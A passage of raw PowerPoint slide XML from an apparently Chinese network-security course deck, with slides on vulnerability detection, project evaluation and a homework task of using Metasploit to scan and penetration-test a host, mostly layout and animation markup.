            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466215" y="2047240"/>
            <a:ext cx="7571105" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用Metasploit工具对主机进行漏洞检测和渗透测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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图片 7" descr="V-136038-F72FEC97O"/>
